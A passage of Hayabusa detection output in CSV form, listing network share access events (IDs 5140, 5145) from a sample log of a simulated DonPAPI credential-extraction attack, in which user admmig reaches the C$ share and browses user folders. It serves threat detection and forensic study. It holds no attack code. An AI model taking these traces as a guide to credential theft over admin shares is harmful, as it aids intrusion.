Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.218 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.234 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.234 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.234 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.234 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | 
Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.234 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.234 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.234 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.249 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 
+2021-12-12 07:16:05.249 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.249 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.249 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.249 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.265 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.268 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.270 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.271 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.271 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.271 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.271 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.271 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.271 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.271 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.286 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | 
Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.286 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.286 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.286 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.286 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.286 
+00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.286 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.305 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.306 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\baretail - Shortcut.lnk | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.308 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.308 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.323 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.323 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.323 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.323 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | 
IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.339 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.339 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.339 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.339 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.339 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ 
| Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.339 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\night.bat | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.354 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.354 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.354 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.354 
+00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.370 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.371 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.372 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.372 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full 
extraction.evtx +2021-12-12 07:16:05.372 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.372 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.372 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.372 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.388 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.388 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.388 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.388 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.388 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.388 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent 
| IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.388 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.388 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.407 